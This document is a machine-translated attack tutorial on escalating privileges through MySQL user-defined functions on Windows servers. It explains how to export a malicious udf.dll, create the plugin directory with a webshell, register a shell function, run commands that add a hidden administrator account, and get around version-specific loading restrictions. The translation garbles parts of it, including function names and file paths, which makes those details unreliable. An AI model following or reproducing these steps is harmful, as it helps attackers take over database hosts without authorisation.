I. Applicable Conditions
1. The target system is Windows (Win2000, XP, Win2003 );
2. You already have a user account of MYSQL. This account must have the insert and delete permissions on mysql to create and discard functions (MYSQL document primitive ).
3. Have the root account and password
Ii. Export udf
Export path for MYSQL 5.1 or earlier versions:
C: \ Winnt \ udf. dll 2000
C: \ Windows \ udf. dll 2003 (some systems \ Are escaped and must be changed to C: \ Windows \ udf. dll)
When exporting DLL files, do not pay attention to the export path (generally any directory can be written, without permission concerns)
For MYSQL 5.1 or later versions, you must put the udf. dll file in the lib \ plugin folder under the MYSQL installation directory to create a user-defined function.
You can enter
Select @ basedir
Show variables like '% plugins %' find the mysql installation path
This directory does not exist by default. Therefore, we need to use webshell to find the MYSQL installation directory, create the lib \ plugin folder under the installation directory, and then set the udf. export the dll file to this directory.
Iii. Elevation of Privilege
Use SQL statements to create functions. Syntax: Create Function Name (the Function name can only be one of the following lists) returns string soname 'export DLL path ';
Create function example shell returns string soname 'udf. dll'
Select writable shell ('net user arsch/add ');
Select foreign shell ('net localgroup administrators arsch/add ');
Drop function using shell;
Summary:
Mysql supports UDF extension, so that we can call the functions in the DLL to implement some special functions.
However, the specific limitations of UDF vary with MYSQL versions. Record the following:
In versions earlier than MYSQL 4.1, any function in all DLL files can be registered in MYSQL for MYSQL to call.
No matter where the DLL is, what the function declaration is.
In MYSQL 4.1 and later versions, UDF functions are restricted. Only functions that implement a specific interface can be successfully registered in MYSQL,
This prevents unauthorized calling of system DLL through MYSQL.
After MYSQL5.0, the location of the registered DLL is limited. When creating a function, the corresponding DLL cannot contain/or \. Simply put, it cannot be an absolute path.
So we release the DLL to the system32 directory to skip this restriction .. or put it in the root directory of the drive letter and skip the restriction using the c: udf. dll format.
Later, we found that if we put the dll under any directory indicated by the Environment Variable PATH, the effect was the same as that under the system32 directory.
Besides MYSQL5.1, there is a problem I believe you will often encounter ..
When you create a function, you may encounter:
An error occurred while querying the database. Check whether the SQL statement create function shell returns string soname 'udf. dll 'syntax is correct. Function 'mongoshell' already exists
The official description is as follows:
Http://bugs.mysql.com/bug.php? Id = 15439
Description:
Under some circumstances, case handling of UDF names leads to strange behaviour.
This can result in a situation where the function can be successfully dropped
Without actually removing the corresponding entry from the mysql. func table.
............ This is because MYSQL 5.1 and later versions have additional restrictions.
The DLL used to create a function can only be placed in the plugin directory of mysql ..
This plug-in directory does not exist by default .. It may be to prevent the DLL from being written to this folder through into dumpfile ..
MYSQL cannot create a directory. If the target directory of into dumpfile does not exist, an error is returned.
Therefore, it is necessary to determine the MYSQL version before exporting the UDF permission.
If it is later than 5.1, it will not work. If it is a function created in a version earlier than 5.1, the error "Can't open shared library" will also be reported.
Check whether the DLL has been exported, or if it has been killed for soft isolation or removal.